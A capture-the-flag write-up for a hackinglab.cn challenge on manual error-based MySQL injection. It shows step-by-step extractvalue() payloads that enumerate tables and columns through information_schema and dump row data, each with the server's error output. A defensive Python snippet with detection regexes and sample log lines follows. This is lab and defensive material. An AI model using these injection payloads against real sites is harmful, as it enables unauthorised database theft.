hackinglab.cn Injection Level 6

Challenge:

This challenge is a manual injection exercise, mainly for practising manual injection based on MySQL error messages. Sqlmap will certainly solve it, so there is no need to test with it. The flag does not contain key or #


Writeup:

The challenge states outright that this is manual injection based on MySQL error messages.

  1. After opening the challenge, the following page is returned:
    username:admin
    status:ok 

    Appending a single quote directly returns:
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'' limit 1' at line 1
    username:admin'
    status:ok
    

  2. This fragment is visible right away:
     ''admin'' limit 1'

    From it we can infer that the backend SQL statement is roughly the following (table is a placeholder name):
    "select * from table where username=\'$_GET['username']\' limit 1"
  3. There are many ways to do error-based injection (see the overview at http://www.2cto.com/database/201410/344310.html); here we use one that relies on the extractvalue function:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(injected SQL query)))%23
  4. Dump the table names:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':log,motto,user'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))#
    status:ok
    

    Three tables are found: log, user and motto.
  5. Dump the column names (using motto as the example):
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':id,username,motto'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))#
    status:ok
    

    The columns are id, username and motto.
  6. Query the values of each column:
     
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':mymotto,happy everyday,nothing '
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(motto) from motto)))#
    status:ok
    

    ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':admin,guest,test,#adf#ad@@#'
    username:admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))#
    status:ok
    

    Notice that across the two injections the username column returns one more result than the motto column, which suggests that the flag may be in the missing result (there should be a way to know this in advance; I found it by comparison, as I am new to injection and my technique is not yet up to scratch).
  7. Construct the following statement, using limit to select that single row:
    ?username=admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))%23

    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 20
    
    Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php on line 24
    XPATH syntax error: ':key#notfound!#:'
    username:admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))#
    status:ok
    

    Then, following the challenge hint, remove key and the # signs to get the flag!!
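The following is an added example, not part of the original writeup, showing how a defender would spot this technique in web-server access logs and responses: it flags the request-side signatures of the payloads above (extractvalue()/updatexml() wrapped around concat(), information_schema enumeration, a trailing comment terminator) and extracts whatever the XPath error message disclosed. The log format, client address, timestamps and response sizes are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request-side signatures of the error-based technique used in the writeup.
SIGNATURES = {
    "xml_error_function": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "concat_with_marker": re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+\s*,", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)\s*$"),
}
# Response-side signal: MySQL echoes the injected data inside this XPath error.
XPATH_LEAK = re.compile(r"XPATH syntax error: '(.*?)'")
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_params(target):
    """Decode the query string of a request target into {name: value}."""
    return dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))

def classify_request(target):
    """Return the names of the signatures matched by any parameter value."""
    hits = set()
    for value in decode_params(target).values():
        for name, pattern in SIGNATURES.items():
            if pattern.search(value):
                hits.add(name)
    return hits

def scan_log(lines):
    """Return [(target, matched signatures)] for suspicious log lines only."""
    findings = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if m:
            hits = classify_request(m.group(1))
            if hits:
                findings.append((m.group(1), hits))
    return findings

def leaked_data(response_body):
    """Return the text disclosed through the XPath error, or None."""
    m = XPATH_LEAK.search(response_body)
    return m.group(1) if m else None

# Constructed sample log lines (hypothetical host, timestamps and sizes):
# one benign request followed by the step 4 and step 7 payloads, URL-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2016:10:00:00 +0800] "GET /index.php?username=admin HTTP/1.1" 200 312',
    '10.0.0.5 - - [01/Jan/2016:10:00:07 +0800] "GET /index.php?username=admin%27%20and%20extractvalue(rand(),concat(0x3a,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())))%23 HTTP/1.1" 200 987',
    '10.0.0.5 - - [01/Jan/2016:10:00:15 +0800] "GET /index.php?username=admin%27%20and%20extractvalue(rand(),concat(0x3a,(select%20concat(motto,0x3a)%20from%20motto%20limit%203,1)))%23 HTTP/1.1" 200 911',
]
```

Against a real server leaked_data() never returns more than 32 characters, because MySQL truncates the XPath error text to 32 characters; that is why ':mymotto,happy everyday,nothing ' in step 6 stops at exactly 32 characters and the fourth row is cut off rather than hidden.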
